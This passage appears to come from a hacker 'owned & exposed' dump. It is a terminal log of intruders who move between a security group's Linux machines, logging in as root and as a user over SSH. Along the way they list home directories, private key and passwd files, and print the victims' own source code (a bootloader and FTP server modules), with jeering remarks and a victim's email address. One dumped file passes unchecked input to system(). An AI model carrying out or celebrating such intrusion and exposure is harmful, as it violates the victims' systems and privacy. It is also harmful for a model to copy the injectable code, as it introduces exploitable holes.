        loopnz clear_buf ; loop until buffer is empty
        mov al, 0D1h ; keyboard: write to output port
        out 64h, al ; output command to keyboard
clear_buf2:
        in al, 64h ; wait 'till buffer is empty again
        test al, 02h
        loopnz clear_buf2
        mov al, 0dfh ; keyboard: set A20
        out 60h, al ; send it to the keyboard controller
        mov cx, 14h
wait_kbc: ; this is approx. a 25uS delay to wait
        out 0edh, ax ; for the kb controler to execute our
        loop wait_kbc ; command.

; the A20 line is on now. Let's load in our ITD and GDT tables...
; Ideally, there will actually be data in their locations (by loading
; the kernel)
; lidt [pIDT]
; lgdt [pGDT]
        sti
        ret

pmod: ; now let's enter pmode...
        mov eax, cr0 ; load the control register in
        or al, 1 ; set bit 1: pmode bit
        mov cr3, eax ; copy it back to the control register

pIDT    dw 7FFh ; limit of 256 IDT slots
        dd 0000h ; starting at 0000

pGDT    dw 17FFh ; limit of 768 GDT slots
        dd 0800h ; starting at 0800h (after IDT)
        ret

times 510-($-$$) db 0
dw 0AA55h
debian:/var/www# cat smnt.c
/* SMNT command coded by COld@Rosiello.net, copyright 2005 */
#if defined(HAVE_SYS_MOUNT_H)
#include
#endif
#include
#include
#include
#include
#include
#include
#define __GIVE_SES__
#include
#include
#include
#if defined(HAVE_SYS_TYPES_H)
#include
#endif

#define INCOUNT_ERROR -2
#define MOUNTED -1
#define NOT_MOUNTED 0

static char purpose[] = "SMNT, is implemented to let the user mount other fileystems";

int SMNT_CMD(int argc, char *argv[])
{
    char *execmds[5], cmd[128];
    int fd;
    uid_t uid;
    uid = getuid();
    int ret, len;

    if((int)uid != 0){
        s_send(ses ->fd, " Permission denied");
        return 0;
    }
    if(argc != 1) {
        s_send(ses ->fd, "501 Snyax error.");
        return 0;
    }
    execmds[1] = argv[1];
    len = snprintf(cmd, sizeof(cmd)-1, "/bin/mount %s", execmds[1]);
    cmd[len] = '\0';
    if((access(execmds[1],F_OK)) != 0) {
        s_send(ses ->fd," Filesystem %s does not exist", execmds[1]);
        return 0;
    }
    /*
    if((fd = open(execmds[1],O_WRONLY)) == 0) {
        s_send(ses ->fd," Filesystem already mounted");
        close(fd);
        return 0;
    }
    */
    if(((ret = system(cmd))) != 0) {
        s_send(ses ->fd, "550 error when mounting %s",execmds[1]);
#if defined(DEBUG)
        debug_msg("Error: %s user passed %s and it failed",ses->u_name,ses->u_lastcmd);
#endif
        return 0;
    }
    s_send(ses ->fd,"200 Successful mount");
    return 0;
}

struct module *mod_init(void)
{
    struct module *mod;

    if(!(mod = malloc((int)sizeof(struct module)))){
        fprintf(stderr,"Error when trying to allocate memory using malloc");
        return NULL;
    }
    mod->vendor = strdup("Rosiello");
    mod->author = strdup("Cold");
    mod->email = strdup("swash151@hotmail.com");
    mod->name = strdup("SMNT");
    mod->explain = strdup(purpose);
    mod->version[0] = 1;
    mod->version[1] = 1;
    mod->main = strdup("SMNT_CMD");
    mod->term = strdup("term");
    mod->type = MOD_CMD;
    mod->need_argc = 1;
    mod->need_reg = 1;
    if((addcommand("SMNT",1,SMNT_CMD,1,1)) < 0) {
        return NULL;
    }
    return mod;
}

int checkmounts()
{
/*
    FILE *fd;
    char c,buf[500];

    if((fd = fopen("/proc/mounts",'r')) == -1) {
#if defined(DEBUG)
        debug_msg("Error: when opening file '/proc/mounts', fopen failed");
#endif
        perror("OPEN:");
        s_send(" smnt incountered a error");
        return INCOUNT_ERROR;
    }
    bzero(buf,(int)sizeof(buf)-1); /* Zero out Buffer*/
    /* parse this B*tch */
/*
    while((buf = fgets(buf,) != '\n') {
        if((strcmp(
    }
*/
}

void term()
{
    return;
}
debian:/var/www# ls *
3.asm Screenshot.png boot.asm boot.txt compile.txt edge-01-06-2005.tar.gz extreme.tar.gz index.html la.tar.gz main.c main.txt mod_warez.c module.tar.gz my.asm my.org phpBB-2.0.16.zip smnt.c transfer.c.txt

GT4:
IMG0000.JPG IMG0001.JPG IMG0002.JPG IMG0003.JPG IMG0004.JPG IMG0005.JPG IMG0006.JPG IMG0007.JPG IMG0008.JPG IMG0009.JPG IMG0010.JPG IMG0011.JPG

analog:
analogo.gif bara32.gif barb16.gif barb8.gif barc32.gif bard16.gif bard8.gif bare32.gif barf16.gif barf8.gif barg32.gif barh16.gif barh8.gif bari32.gif barj16.gif barj8.gif sq4.png
analogo.png bara32.png barb16.png barb8.png barc32.png bard16.png bard8.png bare32.png barf16.png barf8.png barg32.png barh16.png barh8.png bari32.png barj16.png barj8.png sq5.png
bara1.gif bara4.gif barb2.gif barc1.gif barc4.gif bard2.gif bare1.gif bare4.gif barf2.gif barg1.gif barg4.gif barh2.gif bari1.gif bari4.gif barj2.gif html2.gif sq6.png
bara1.png bara4.png barb2.png barc1.png barc4.png bard2.png bare1.png bare4.png barf2.png barg1.png barg4.png barh2.png bari1.png
bari4.png barj2.png html2.png sq7.png bara16.gif bara8.gif barb32.gif barc16.gif barc8.gif bard32.gif bare16.gif bare8.gif barf32.gif barg16.gif barg8.gif barh32.gif bari16.gif bari8.gif barj32.gif sq0.png sq8.png bara16.png bara8.png barb32.png barc16.png barc8.png bard32.png bare16.png bare8.png barf32.png barg16.png barg8.png barh32.png bari16.png bari8.png barj32.png sq1.png sq9.png bara2.gif barb1.gif barb4.gif barc2.gif bard1.gif bard4.gif bare2.gif barf1.gif barf4.gif barg2.gif barh1.gif barh4.gif bari2.gif barj1.gif barj4.gif sq2.png sqg.png bara2.png barb1.png barb4.png barc2.png bard1.png bard4.png bare2.png barf1.png barf4.png barg2.png barh1.png barh4.png bari2.png barj1.png barj4.png sq3.png apache2-default: CHANGELOG apache_pb2.gif configuration.php-dist images index.html.dk index.html.fr index.html.lb.utf8 index.html.pt-br index.html.sv installation offline.php INSTALL apache_pb2.png editor includes index.html.ee index.html.he.iso8859-8 index.html.nl index.html.ru.cp-1251 index.html.var language pathway.php LICENSE apache_pb2_ani.gif extreme index.html index.html.el index.html.hr.iso8859-2 index.html.nn index.html.ru.cp866 index.html.zh-cn.gb2312 mainbody.php robots.txt administrator cache globals.php index.html.ca index.html.en index.html.it index.html.no index.html.ru.iso-ru index.html.zh-tw.big5 mambots templates apache_pb.gif components help index.html.cz.iso8859-2 index.html.es index.html.ja.iso2022-jp index.html.po.iso8859-2 index.html.ru.koi8-r index.php media apache_pb.png configuration.php htaccess.txt index.html.de index.html.et index.html.ko.euc-kr index.html.pt index.html.ru.utf8 index2.php modules bugzilla: 1x1.gif ant.jpg css data index.html js localconfig.js padlock.png productmenu.js quicksearch.html quicksearch.js quicksearchhack.html robots.txt skins dc: Compilation issue`s.html Manual index page.html Setting up vhosts.html configure.html ginfo.html index.html manual downloads: Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad 
Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar sensation3 Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad Religion-The Answer.mp3 fransfer.txt edge: Plone-2.0.5 Plone-2.0.5.tar config.php edge-0.1.1-i edge-0.1.1-i.tar edge-01-06-2005 edge-01-06-2005.tar phpMyAdmin-2.6.2-pl1 phpMyAdmin-2.6.2-pl1.zip phpMyAdmin-2.6.2-pl1.zip?download extreme: icons: analogo.gif bara32.gif barb16.gif barb8.gif barc32.gif bard16.gif bard8.gif bare32.gif barf16.gif barf8.gif barg32.gif barh16.gif barh8.gif bari32.gif barj16.gif barj8.gif sq4.png analogo.png bara32.png barb16.png barb8.png barc32.png bard16.png bard8.png bare32.png barf16.png barf8.png barg32.png barh16.png barh8.png bari32.png barj16.png barj8.png sq5.png bara1.gif bara4.gif barb2.gif barc1.gif barc4.gif bard2.gif bare1.gif bare4.gif barf2.gif barg1.gif barg4.gif barh2.gif bari1.gif bari4.gif barj2.gif html2.gif sq6.png bara1.png bara4.png barb2.png barc1.png barc4.png bard2.png bare1.png bare4.png barf2.png barg1.png barg4.png barh2.png bari1.png bari4.png barj2.png html2.png sq7.png bara16.gif bara8.gif barb32.gif barc16.gif barc8.gif bard32.gif bare16.gif bare8.gif barf32.gif barg16.gif barg8.gif barh32.gif bari16.gif bari8.gif barj32.gif sq0.png sq8.png bara16.png bara8.png barb32.png barc16.png barc8.png bard32.png bare16.png bare8.png barf32.png barg16.png barg8.png barh32.png bari16.png bari8.png barj32.png sq1.png sq9.png bara2.gif barb1.gif barb4.gif barc2.gif bard1.gif bard4.gif bare2.gif barf1.gif barf4.gif barg2.gif barh1.gif barh4.gif bari2.gif barj1.gif barj4.gif sq2.png sqg.png bara2.png barb1.png barb4.png barc2.png bard1.png bard4.png bare2.png barf1.png barf4.png barg2.png barh1.png barh4.png bari2.png barj1.png barj4.png sq3.png images: webcam.jpg imgsystem: 0x5a arrowleft.gif arrowup.gif ece.gif folder.png foldernew.png follow.png locked.gif logo.gif.bk memoalert.gif newtopic.png sticky.png arrowdown.gif arrowright.gif 
country edgeotaz.gif foldern.png folders.png icq.gif logo.gif mail.gif new.gif page.gif jatx: White Town - I Could Never be Your Woman.mp3 download index.html jatx.tar.gz link.html screens src manual: Compilation issue`s.html Manual index page.html Setting up vhosts.html configure.html ginfo.html index.html module: Makefile TODO main main.c module.h modules pacct: COPYRIGHTS LOGO README TODO debiancoder.jpg headers man pacct pacct.tar.gz src test pgp: rave.asc pics: PIC.JPG PICT0056.JPG PICT0073.JPG PICT0080.JPG cam.mov const.iso lo snap-unknown-20050514-154211-1.jpeg snap-unknown-20050514-154332-1.jpeg snap-unknown-20050514-154342-1.jpeg snapshot2.png priv: funcs images index.php la.php site: abuse.html committee.html footer.php include index.phps menu.php rss.php site.tar sql.php test.html top.php uploads call.html error.php images index.php index2.html papers.html rss.xml site.tar.gz submit.html thankyou.html uploaders.phps waiting.html upload: uploads: orig00000005.jpg orig00000006.jpg orig00000007.jpg orig00000008.jpg webcam: index.html wiki: AdminSettings.sample FAQ INSTALL README UPGRADE config extensions img_auth.php index.php irc maintenance redirect.php skins wiki.phtml COPYING HISTORY LocalSettings.php RELEASE-NOTES Version.php docs images includes install-utils.inc languages math redirect.phtml tests xcs: ARIAL.TTF funcs include index.php stat.php zoper: Extensions Products README.txt bin etc import inituser log var debian:/var/www# ls pics/* pics/PIC.JPG pics/PICT0073.JPG pics/cam.mov pics/lo pics/snap-unknown-20050514-154332-1.jpeg pics/snapshot2.png pics/PICT0056.JPG pics/PICT0080.JPG pics/const.iso pics/snap-unknown-20050514-154211-1.jpeg pics/snap-unknown-20050514-154342-1.jpeg debian:/var/www# echo "next box =)" next box =) [3] laptop.localdomain (192.168.0.6) owned & exposed debian:/var/www# ssh 192.168.0.2 -l root Password: Last login: Wed Aug 17 22:28:51 2005 from laptop.localdomain debian:~# uname -a; id Linux debian.rosiello.net 2.4.27-2-386 
#1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
debian:~# ls /home/
amanda angelo cold commiters cvsuser infobot mailman pisg rave saxa top
debian:~# ls /home/*
/home/amanda:
Desktop Mail

/home/angelo:

/home/cold:

/home/commiters:

/home/cvsuser:
CVS CVSROOT

/home/infobot:
infobot-0.45.3 infobot-0.45.3.tar

/home/mailman:
Mailman archives bin cgi-bin cron data filters icons lists locks logs mail qfiles scripts spam templates

/home/pisg:
blue-h.png blue-v.png green-h.png green-v.png html index.html pisg.cfg red-h.png red-v.png yellow-h.png yellow-v.png

/home/rave:
1077606958.gif Desktop Mail bin bk cmds cvsroot dr.c edge extra extreme gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh

/home/saxa:

/home/top:

[3]

debian:/var/www# ssh 192.168.0.6 -l rave
Password:
Last login: Thu Aug 18 18:46:41 2005 from 192.168.0.10
rave@debian:~$ uname -a; id
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
uid=1000(rave) gid=1000(rave) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(rave)
rave@debian:~$ echo "Please stop calling everyone of your boxes for DEBIAN"
Please stop calling everyone of your boxes for DEBIAN
rave@debian:~$ w
 22:28:03 up 5:21, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rave :0 - 17:07 ?xdm? 10:05 0.49s /usr/bin/gnome-session
rave@debian:~$ echo "Hurray his laaaaptop"
Hurray his laaaaptop
20050729-Floortje.JPG aclocal.m4 config-2.4.27-2-386 extra gFTPd jatx.bmp ndiswrapper_1.1-4.diff.gz ptracetest.c.html server.req.pem ssl.rnd
CVS amaroK.pm d extreme gnome jatx.jpg ndiswrapper_1.1-4.dsc rfc2228.txt spca5xx-20050701 ssl_error.txt
Desktop amarok_window.pl devforum extreme2 hello.c modules ndiswrapper_1.1.orig.tar.gz rfc2228_2.txt spca5xx-20050701.tar ubuntu-5.04-install-i386.iso
Destkop amarok_xchat.pl downloads fd hello.o montagnes_001.jpg o.ogg server.cert.pem ssl.bk vsftpd-2.0.3
Makefile cmds everyday.jpg ftppasswd jatx ndiswrapper-1.1 passwd server.key.pem ssl.cnf wzdftpd-0.5.2
rave@debian:~$ cat amarok_xchat.pl
#!/usr/bin/perl -w
use strict;

##!! Copy amaroK.pm to /usr/share/perl5/
use amaroK;

## Mode ACTION = mynick is playing David Lee Roth - Yankee Rose
## MSG = <@mynick> np: David Lee Roth - Yankee Rose
our $mode = "msg";

## Change this!
our $dcop = "/usr/bin/dcop";

## Format (case-sensitive!)
# our $format = "{nowPlaying} - {album} ( {currentTime}/{totalTime}, {bitrate}, {sampleRate} Hz )";
our $format = "{artist} - {title} ( {currentTime}/{totalTime} )";

sub amarok_np {
    my $output;
    my $amarok;
    eval {
        $amarok = new amaroK($format, $dcop);
        $output = $amarok->get();
    };
    if ($@) {
        Xchat::print( $@ );
        return 0;
    }
    if ($output) {
        IRC::command( ($mode eq "MSG"?"/say np:":"/me is playing") ." $output");
        return 1;
    }
}

sub amarok_cmd {
    my $amarok;
    eval {
        $amarok = new amaroK($format, $dcop);
        $amarok->command($_[1][1]);
    };
    Xchat::print( $@ ) if ($@);
}

Xchat::register("NP Script for amaroK", 0.1);
Xchat::print("Now playing script for amaroK");
Xchat::hook_command("amarok", "amarok_np");
Xchat::hook_command("amarokcmd", "amarok_cmd");
rave@debian:~$ cat amarok_window.pl
#!/usr/bin/perl -w
use strict;
use Glib qw/TRUE FALSE/;
use Gtk2 '-init';
use amaroK;

our $amarok;
our $dcop = "/usr/bin/dcop";
our $format = "{artist} - {title} ( {currentTime}/{totalTime} )";
our @controls = (
    [ '|<' , 'prev' ],
    [ '|>' , 'play' ],
    [ '||' , 'playPause' ],
    [ '[]' , 'stop' ],
    [ '>|' , 'next' ],
    [ '[+]' , 'volumeUp' ],
    [ '[-]' , 'volumeDown']
);

sub command {
    my ( $btn, $args ) = @_;
    $amarok->command( $args );
}

sub delete_event {
    Gtk2->main_quit;
    return FALSE;
}

sub init {
    my $mainwnd = new Gtk2::Window( 'toplevel' );
    $mainwnd->move( 350, 350 );
    $mainwnd->set_title( '...:: amaroK control panel ::...' );
    $mainwnd->signal_connect( delete_event => \&delete_event );

    my $statusbar = new Gtk2::Statusbar;
    $statusbar->show( );

    eval {
        $amarok = new amaroK( $format, $dcop );
        $statusbar->push( 0, $amarok->get( ) );
    };
    warn "$@\n" if( $@ );

    my $buttonbox = new Gtk2::HBox(FALSE, 0);

    # create controls
    for ( @controls ) {
        my @control = $_;
        my $button = Gtk2::Button->new( $control[0][0] );
        # add signal handler for click
        $button->signal_connect( clicked => \&command, $control[0][1] );
        # add button to box
        $buttonbox->pack_start( $button, TRUE, TRUE, 0 );
        $button->show( );
    }
    $buttonbox->show( );

    # contains buttonbox and statusbar
    my $vbox = Gtk2::VBox->new(FALSE, 0);
    $vbox->pack_start( $buttonbox, TRUE, TRUE, 0 );
    $vbox->pack_start( $statusbar, TRUE, TRUE, 0 );
    $vbox->show( );

    $mainwnd->add( $vbox );
    $mainwnd->show( );

    # update interval 2,5 sec
    Glib::Timeout->add(2500, sub { $statusbar->push( 0, $amarok->get ); }, undef);
}

&init( );
Gtk2->main( );
0;
rave@debian:~$ ls -la
total 609284
drwxr-xr-x 54 rave rave 4096 Aug 18 21:03 .
drwxrwsr-x 4 root staff 4096 Aug 6 21:02 ..
lrwxrwxrwx 1 rave rave 32 Aug 18 17:10 .DCOPserver_debian_:0 -> /home/rave/.DCOPserver_debian__0
-rw-r--r-- 1 rave rave 53 Aug 18 17:10 .DCOPserver_debian__0
-rw------- 1 rave rave 1682 Aug 18 17:10 .ICEauthority
drwx------ 4 rave rave 4096 Aug 18 07:02 .Trash
-rw------- 1 rave rave 117 Aug 18 17:07 .Xauthority
-rw-r--r-- 1 rave rave 75 Aug 13 20:46 .Xclients
drwx------ 2 rave rave 4096 Aug 13 03:06 .alsaplayer
-rw------- 1 rave rave 5759 Aug 18 18:53 .bash_history
-rw-r--r-- 1 rave rave 704 Jul 31 22:33 .bash_profile
-rw-r--r-- 1 rave rave 1298 Aug 18 18:50 .bashrc
drwxr-xr-x 2 rave rave 4096 Aug 4 15:09 .bluefish
drwxr-xr-x 4 rave rave 4096 Aug 7 06:07 .cddb
drwxr-xr-x 2 rave rave 4096 Aug 1 03:08 .cddbslave
drwx------ 3 rave rave 4096 Aug 13 21:26 .config
-rw------- 1 rave rave 24 Aug 13 21:23 .dmrc
drwx------ 5 rave rave 4096 Aug 13 21:22 .enlightenment
drwxr-xr-x 8 rave rave 4096 Aug 18 07:04 .evolution
drwx------ 2 rave rave 4096 Aug 10 02:48 .fluxbox
-rw-r--r-- 1 rave rave 6617 Aug 4 20:40 .fonts.cache-1
-rw-r--r-- 1 rave rave 307 Aug 13 21:27 .fonts.conf
drwx------ 5 rave rave 4096 Aug 18 17:08 .gconf
drwx------ 2 rave rave 4096 Aug 18 20:57 .gconfd
drwxr-xr-x 21 rave rave 4096 Aug 17 20:49 .gimp-2.2
-rw-r----- 1 rave rave 0 Aug 6 03:25 .gksu.lock
drwx------ 4 rave rave 4096 Aug 2 14:28 .gnome
drwx------ 11 rave rave 4096 Aug 18 17:08 .gnome2
drwx------ 2 rave rave 4096 Aug 1 19:52 .gnome2_private
drwx------ 3 rave rave 4096 Aug 13 21:24 .gnupg
drwxr-xr-x 2 rave rave 4096 Aug 1 00:11 .gstreamer-0.8
-rw-r--r-- 1 rave rave 86 Aug 17 22:02 .gtkrc-1.2-gnome2
-rw-r--r-- 1 rave rave 162 Aug 17 22:10 .gtkrc-2.0
drwxr-xr-x 2 rave rave 4096 Aug 1 01:07 .icons
drwxr-xr-x 2 rave rave 4096 Aug 17 21:40 .kasablanca
drwx------ 4 rave rave 4096 Aug 6 03:23 .kde
-rw------- 1 rave rave 154 Aug 13 20:42 .kderc
drwx------ 3 rave rave 4096 Aug 10 02:50 .local
drwxr-xr-x 3 rave rave 4096 Aug 1 01:07 .mcop
-rw------- 1 rave rave 31 Aug 7 03:22 .mcoprc
-rw------- 1 rave rave 31 Aug 5 14:56 .mcoprcX8cPRa.new
drwx------ 3 rave rave 4096 Aug 1 00:11 .metacity
drwx------ 5 rave rave 4096 Aug 4 23:24 .mozilla
-rw------- 1 rave rave 749 Aug 18 20:36 .nano_history
drwxr-xr-x 3 rave rave 4096 Aug 1 00:11 .nautilus
drwxr-xr-x 3 rave rave 4096 Aug 5 23:40 .openoffice
drwxr-xr-x 2 rave rave 4096 Aug 15 19:37 .qt
-rw------- 1 rave rave 25002 Aug 18 21:53 .recently-used
drwx------ 2 rave rave 4096 Aug 1 00:13 .ssh
-rw-r--r-- 1 rave rave 69 Aug 5 23:40 .sversionrc
drwxr-xr-x 2 rave rave 4096 Aug 1 01:07 .themes
drwx------ 5 rave rave 4096 Aug 6 03:23 .thumbnails
-rw------- 1 rave rave 3745 Aug 17 23:37 .viminfo
drwxr-xr-x 4 rave rave 4096 Aug 15 21:35 .wine
drwx------ 4 rave rave 4096 Aug 18 07:03 .xchat2
drwxr-xr-x 2 rave rave 4096 Aug 2 01:46 .xine
-rw-r--r-- 1 rave rave 75 Aug 13 20:46 .xinitrc
drwxr-xr-x 4 rave rave 4096 Aug 1 03:10 .xmms
-rw-r--r-- 1 rave rave 75 Aug 13 20:46 .xsession
-rw-r--r-- 1 rave rave 200110 Aug 18 20:44 .xsession-errors
-rw-r--r-- 1 rave rave 348626 Aug 5 00:51 20050729-Floortje.JPG
drwxr-xr-x 2 rave rave 4096 Aug 17 23:32 CVS
drwxr-xr-x 5 rave rave 4096 Aug 18 21:53 Desktop
drwxrwxrwx 4 rave rave 4096 Aug 2 00:29 Destkop
-rw-r--r-- 1 rave rave 7852 Aug 16 21:46 Makefile
-rw-r--r-- 1 rave rave 38468 Aug 3 08:43 aclocal.m4
-rw-r--r-- 1 rave rave 3600 May 19 19:03 amaroK.pm
-rwxr-xr-x 1 rave rave 1841 May 21 22:00 amarok_window.pl
-rw-r--r-- 1 rave rave 1154 May 19 19:03 amarok_xchat.pl
drwxr-xr-x 3 rave rave 4096 Aug 17 23:20 cmds
-rw-r--r-- 1 rave rave 44852 Aug 2 21:11 config-2.4.27-2-386
-rw-r--r-- 1 rave rave 168 Aug 14 22:12 d
drwxr-xr-x 4 rave rave 4096 Aug 12 20:13 devforum
drwxrwxrwx 4 rave rave 4096 Aug 1 01:44 downloads
-rw-r--r-- 1 rave rave 722888 Aug 18 07:00 everyday.jpg
drwxr-xr-x 5 rave rave 4096 Aug 17 23:35 extra
drwxr-xr-x 12 rave rave 4096 Aug 18 20:55 extreme
drwxr-xr-x 4 rave rave 4096 Aug 17 22:20 extreme2
-rw-r--r-- 1 rave rave 0 Aug 14 22:06 fd
drwxr-xr-x 2 rave rave 4096 Aug 10 00:12 ftppasswd
drwxr-xr-x 4 rave rave 4096 Aug 14 16:53 gFTPd
drwxr-xr-x 2 rave rave 4096 Aug 14 17:10 gnome
-rw-r--r-- 1 rave rave 344 Aug 14 16:34 hello.c
-rw-r--r-- 1 root root 51800 Aug 14 16:41 hello.o
drwxr-xr-x 8 rave rave 4096 Aug 12 14:53 jatx
-rw-r--r-- 1 rave rave 48450 Aug 17 20:42 jatx.bmp
-rw-r--r-- 1 rave rave 2205 Aug 17 20:50 jatx.jpg
drwxr-xr-x 3 rave rave 4096 Aug 3 01:28 modules
-rw-r--r-- 1 rave rave 112513 Aug 18 07:01 montagnes_001.jpg
drwxr-xr-x 5 rave rave 4096 Mar 5 02:51 ndiswrapper-1.1
-rw-r--r-- 1 rave rave 7155 Apr 11 10:02 ndiswrapper_1.1-4.diff.gz
-rw-r--r-- 1 rave rave 613 Apr 11 10:02 ndiswrapper_1.1-4.dsc
-rw-r--r-- 1 rave rave 135361 Mar 26 10:32 ndiswrapper_1.1.orig.tar.gz
-rwxr-xr-x 1 root root 4711976 Aug 2 01:46 o.ogg
-rw-r--r-- 1 rave rave 1201 Aug 3 00:46 passwd
-rw-r--r-- 1 rave rave 8486 Aug 1 21:29 ptracetest.c.html
-rw-r--r-- 1 rave rave 58733 Aug 15 20:50 rfc2228.txt
-rw-r--r-- 1 rave rave 58733 Aug 16 20:53 rfc2228_2.txt
-rw------- 1 rave rave 1273 Aug 16 21:52 server.cert.pem
-rw------- 1 rave rave 887 Aug 16 21:52 server.key.pem
-rw------- 1 rave rave 696 Aug 16 21:52 server.req.pem
drwxr-xr-x 4 500 users 4096 Aug 6 15:14 spca5xx-20050701
-rw-r--r-- 1 rave rave 942080 Aug 6 15:13 spca5xx-20050701.tar
-rw-r--r-- 1 rave rave 15229 Aug 14 17:58 ssl.bk
-rw------- 1 rave rave 915 Aug 16 21:51 ssl.cnf
-rw------- 1 rave rave 1024 Aug 16 21:52 ssl.rnd
---------- 1 rave rave 518 Aug 16 19:45 ssl_error.txt
-rw-r--r-- 1 rave rave 615307264 Aug 6 02:17 ubuntu-5.04-install-i386.iso
drwxr-xr-x 9 rave rave 4096 Aug 15 03:54 vsftpd-2.0.3
drwxr-xr-x 17 root root 4096 Aug 14 21:08 wzdftpd-0.5.2
rave@debian:~$ cat hello.c
#define __KERNEL__
//#define MODULE
#include
#include

MODULE_LICENSE("Dual BSD/GPL");

static int hello_module(void)
{
    printk(KERN_ALERT, "<1>Hello, world\n");
    return 0;
}

static void cleanup(void)
{
    printk(KERN_ALERT,"<1>Goodbye cruel world\n");
}

module_init(hello_module);
module_exit(cleanup);
rave@debian:~$ cat cmds/port.c
/***************************************************
** Source code owned by rosiello security. For bugs
** Contact rave@rosiello.org
****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define USE_IPV6
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern SESSION *ses;
extern struct momba irc;

static void filter_port(char *str, int *prt,char *ip)
{
    int a[4];
    int high,low;

    sscanf(str, "%d,%d,%d,%d,%d,%d",&a[0],&a[1],&a[2],&a[3],&low,&high);
    snprintf(ip,20, "%d.%d.%d.%d",a[0], a[1], a[2], a[3]);
    (*(int *)prt) = ((low&0xFF)<<8)|(high&0xFF);
    return ;
}

int port (void)
{
    char ip[128];
    int prt;

    clean (ip);
    prt = 0;

    if ( irc.argc == 1 && s_strnlen(irc.argv[1], sizeof(ip)-1) >=20)
        s_send (ses ->fd, MSG_PORTFAIL);

    /* Anon users are not allowed to abuse port bounces
    if (c ->u_anon == yes && !strcmp(c ->ip, ip))
        s_send (ses ->fd, MSG_PORTFAIL);
    */
    filter_port(irc.argv[1], &prt, ip);
    ses ->req_port = prt;
    mcpy(ses ->req_host , ip);
    ses ->c_type = CON_TO;
    ses ->req_prot = IPv4;
    s_send(ses ->fd, MSG_PORTOK);
    return 0;
}

//EPRT |2|::1|33107|
int eprt(void)
{
    int protocol, port;
    char ip[INET6_ADDRSTRLEN+1];
    char **p, *k;
    int i = 0;

    clean(ip);
    p = &irc.argv[1];

    while ((k=strsep(p, "|"))) {
        if (k)
        switch (i) {
        case 1: protocol = atoi(k); break;
        case 2: strncpy(ip, k, INET6_ADDRSTRLEN); break;
        case 3: port = atoi(k); break;
        }
        ++i;
    }
    snprintf(ses ->req_host, 127, "%s", ip);
    ses ->req_port = port;
    ses ->req_prot = protocol;
    ses ->c_type = CON_TO;
    s_send(ses ->fd, MSG_PORTOK);
    return 0;
}

/**************************************************
** PASSIVE (PASV)
**
** This command requests the server-DTP to "listen" on a data
** port (which is not its default data port) and to wait for a
** connection rather than initiate one upon receipt of a
** transfer command. The response to this command includes the
** host and port address this server is listening on.
*/
int pasv(void)
{
    struct sockaddr_in name;
    socklen_t namelen = sizeof(name);
    unsigned long host;
    long prt;

    /*
    ** Cleaning up old listening/bounded socket(s)
    */
    if ( ses ->req_fd )
        net_close(ses ->req_fd);

    /* We have a port range between 1024 and 1350,
    ** for incomming connections
    */
    for ( prt = 1040; prt < 5999; prt++) {
        /* Bind to port but do NOT listen (FALSE) */
        if ((ses ->req_fd = net_listenses("0.0.0.0", prt, TRUE)))
            break;
    }
    if ( ses ->req_fd == -1)
        return s_send(ses ->fd, MSG_PASVFAIL);

    getsockname((int) 1, (struct sockaddr *) & name, (socklen_t *) & namelen);
    /* Replace */
    host = inet_addr("192.168.0.6");//(unsigned long)name.sin_addr.s_addr;
    ses ->c_type = CON_FROM;
    ses ->req_port = prt;
    /* h00ba h00ba, its magic */
    s_send(ses ->fd, MSG_PASVOK,
        ((host & 0x000000FF) ),
        ((host & 0x0000FF00) >> 8),
        ((host & 0x00FF0000) >> 16),
        ((host & 0xFF000000) >> 24),
        (prt & 0xFF00) >> 8,
        (prt & 0x00FF));
    return 0;
}

int epasv(void)
{
    long prt;

    /*
    ** Cleaning up old listening/bounded socket(s)
    */
    if ( ses ->req_fd != -1 )
        net_close(ses ->req_fd);

    /* We have a port range between 1024 and 1350,
    ** for incomming connections
    */
    for ( prt = 1040; prt < 5999; prt++) {
        /* Bind to port but do NOT listen (FALSE) */
        if ((ses ->req_fd = net_listenses("0.0.0.0", prt, TRUE)) >0)
            break;
    }
    if ( ses ->req_fd == -1)
        return s_send(ses ->fd, MSG_EPASVFAIL);

    ses ->c_type = CON_FROM;
    ses ->req_port = prt;
    //s_send(ses ->fd, "220 %d %d",ses ->req_fd, prt);
    /* h00ba h00ba, its magic */
    s_send(ses ->fd, MSG_EPASVOK, ses ->req_port);
    return 0;
}

int spsv(void)
{
    struct sockaddr_in sin;
#ifdef HAVE_IPV6
    struct sockaddr_in6 sin6;
#endif
    int high = 5999U;
    int low = 1040U;
    int i = 0, port;
    int fd;

    if ( irc.argc > 1 )
        if ((strcmp(irc.argv[1], "all") == 0) || (strcmp(irc.argv[1], "ALL")==0))
            ses ->epsv_all = yes;

    /* Sir, can you pass me the information cheet plz */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = INADDR_ANY;
#ifdef HAVE_IPV6
    sin6.sin6_family = AF_INET6;
    sin6.sin6_addr = in6addr_any;
#else
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = INADDR_ANY;
#endif

    do {
        // We have 4 trys to to make this work so hope for the best..
        /* Generate random port number between 1040 and 5999 */
        port = low + rand() % (high - low)+1;
        /* This scenario should almost never happen */
        if ( port < low )
            port = high - low;
#ifdef HAVE_IPV6
        sin6.sin6_port = htons(port);
        fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
        bind(fd, (struct sockaddr *)&sin6, sizeof(sin6));
#else
        sin.sin_port = htons(port);
        fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        bind(fd, (struct sockaddr *)&sin, sizeof(sin));
#endif
        if ( listen (fd, 1) != -1 )
            break;
        ++i;
    } while( i < 14);

    ses ->c_type = CON_FROM;
    ses ->req_fd = fd;
    ses ->req_port = port;
    s_send(ses ->fd, MSG_EPASVOK, ses ->req_port);
    return 0;
}
rave@debian:~$ ls *
